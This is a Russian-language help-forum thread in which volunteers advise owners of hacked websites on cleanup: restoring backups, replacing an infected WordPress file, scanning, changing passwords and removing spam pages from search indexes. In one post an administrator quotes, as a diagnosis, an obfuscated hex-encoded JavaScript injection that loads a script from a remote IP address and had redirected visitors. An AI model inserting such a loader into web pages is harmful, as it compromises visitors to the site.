Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
24,588
Реакции
13,563
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например https://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 
К сожалению САППОРТ не может мне предоставить доступ к админ панели, мотивируя тем, что он заражен вирусом.
Я Вам больше скажу, он в принципе не должен был этого делать. Судя по картинкам, у Вас етсь доступ до Панели управления хостингом и доя Управлением БД. В интернете есть инструкции как восстановить доступ к WP через БД,
 
Через панель своего хостинга wp-content/plugins/ я отключил все плагины (_29 шт) сайта хттп://dohodnoemecto.r путем их переименования.
Сайт по-прежнему не открывается и показывает тот код, который я показывал в своем сообщении от
26 Июн 2018
Список применяемых плагинов на сайте прилагаю
 
Последнее редактирование модератором:
Для начало можно сделать резервную копию сайта, полный бэкап всех файлов и БД сохранить. Дальше восстановить резервную копию если такова имеется на момент работоспособности сайта.
После чего сменить пароли от хостинга и фтп возможно БД.

Когда копию восстановить сайт запустить, зайти в панель управления сайтом отключить или удалить плагины. Провести аудит безопасности сайта.

Так же рекомендую все таки нанять специалиста.
 
@raveal-2, вам там прямым тектом пишет, что ошибка из-за файла admin-header.php

и список плагинов лучше удалите из своего поста.
 
Последнее редактирование модератором:
Нус приступим.

1. Делайте бекап файлов и базы данных, дабы все не поломать окончательно.
2. Подготовьте архив чистых файлов WP Русский
3. Замените файл admin-header.php, на чистый из архива (старый файл не удаляйте, а просто переименуйте). Если после замены сайт запустится, то все отлично
4. Качаете скрипт AI-Bolit - антивирус для сайта, сканер вирусов на хостинге и сайте и проверяете содержимое.
5. Смените пароли доступа к сайту и БД. Проверьте наличие левых пользователей.

Если это все сложно, лучше закажите платное лечение (у тех же revisium), а то можете окончательно все поломать.
 
Нус приступим.

1. Делайте бекап файлов и базы данных, дабы все не поломать окончательно.
2. Подготовьте архив чистых файлов WP Русский
3. Замените файл на чистый из архива (старый файл не удаляйте, а просто переименуйте). Если после замены сайт запустится, то все отлично
4. Качаете скрипт AI-Bolit - антивирус для сайта, сканер вирусов на хостинге и сайте и проверяете содержимое.
5. Смените пароли доступа к сайту и БД. Проверьте наличие левых пользователей.

Если это все сложно, лучше закажите платное лечение (у тех же revisium), а то можете окончательно все поломать.
Привет АКОК!
Я сделал бэкап, подготовил чистый архив и вставил чистый файл admin-header.php , переименовал старый файл
dmin-header.php

Теперь, если позволите, пару вопросов дилетанта:
-Мне теперь, для того чтобы проверить работу сайта опять нужно закачать на хостинг этот бэкап с чистым файлом?
-Если "да", то как это сделать? Нужно ли предварительно использовать сканер Ai-Bolit?
-Как проверить наличие левых пользователей?
Спасибо
 
После подготовки резервной копии, нужно было менять файл на самом хостинге, а не в бекапе. Бекап на случай "все пропало". Если сайт запустится, то воспользуйтесь Ai-Bolit, если нет. То тут только переустановка. Не забывайте о бекапе.
 
Здравствуйте.
Avast информирует о зараженной индексной странице сайта х ттр://dohodtut.ru
На остальные страницы сайта Avast не реагирует.
Например - х ттр://dohodtut.ru/index.html или х ттр://dohodtut.ru/MLM_v_%202raza.html
Как данный вирус удалить? Спасибо за ответ
 

Вложения

  • угроза 1.png
    угроза 1.png
    17.6 KB · Просмотры: 94
1. Главная сейчас ничего не отдает, белая страница

2. С dohodtut.ru/index.htm был редирект на start.parimatch.com

В коде
HTML:
<script type="text/javascript">var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));</script>

Описание WordPress Hacks: jQuery JS script injection :: Cybersecurity blog :: www.polaris64.net
 
@akok, Редирект можно как-то удалить?
Теперь и х ттр:// dohodtut.ru/index.htm ничего не отдает, белая страница...
Как исправить? Поможет ли предоставление кода главной страницы?
 
Редирект можно как-то удалить?
отредактировать страницу и убрать вставку в моем предыдущем посте.

С белой страницей, смотрите в настройки хостинга/скрипта или наймите администратора на часок.
и/или закажите лечение на стороннем сервисе (например: Вылечить сайт от вирусов.)
 
Здравствуйте!
Помогите, пожалуйста, с сайтом хттп://belmetall.by
В search console индексируются тысячи страниц, сгенерированных явно вирусом.
site: выдает чего-то с японскими иероглифами... Восстановил бэкап, удалил ненужные расширения, но ситуация с индексацией не поменялась.
Что можно сделать, помогите!!!
 
  1. Сменить пароли доступа к сайту/хостингу (и проверьте список администраторов)
  2. Обновить скрипт до последней версии

После заказать удаление каталогов (они выдают сейчас 404 ошибку)

С ссылками index.php?category сложнее, для удаления нужно сделать редирект на главную (сейчас просто отдается главная страница, а нужен 301 редирект), ну или 404 если не используете категории.

А можно ничего не делать и поисковики сами выбросят страницы из поиска за пару месяцев.
 
  1. Сменить пароли доступа к сайту/хостингу (и проверьте список администраторов)
  2. Обновить скрипт до последней версии
После заказать удаление каталогов (они выдают сейчас 404 ошибку)

С ссылками index.php?category сложнее, для удаления нужно сделать редирект на главную (сейчас просто отдается главная страница, а нужен 301 редирект), ну или 404 если не используете категории.

А можно ничего не делать и поисковики сами выбросят страницы из поиска за пару месяцев.
Спасибо большое за ответ!
Конечно же, 1,2 были сделаны.
Меня беспокоит то, что всё это проделано уже 2 недели назад, а страницы эти по прежнему в индексе, меньше не становиться.
Можно ли как-то убедиться в том, что на сайте в данный момент нет вредоносного кода?
Удалять страницы гугловским инструментом наверное не реально, их же тысячи, как сделать это массово(по шаблону например, или загрузить) я не нахожу.
Не могли бы вы подробнее расписать как сделать редирект, честно говоря совсем новичок(категории не использую)?
Спасибо заранее!
 
уже 2 недели назад
Удаление будет только тогда когда бот их заново проиндексирует, а это занимает месяца.

Можно ли как-то убедиться в том, что на сайте в данный момент нет вредоносного кода?
Сейчас признаков взлома нет, отслеживайте метрики в консоли, если количество спам-страниц будет расти, то значит не все обновили.



е могли бы вы подробнее расписать как сделать редирект, честно говоря совсем новичок(категории не использую)?

Если конечно используете Apache
как сделать это массово(по шаблону например, или загрузить) я не нахожу.
Раньше можно было удалять каталоги, но смотрю форму поменяли.

О Yandex вебматере не забывайте.
 
Назад
Сверху Снизу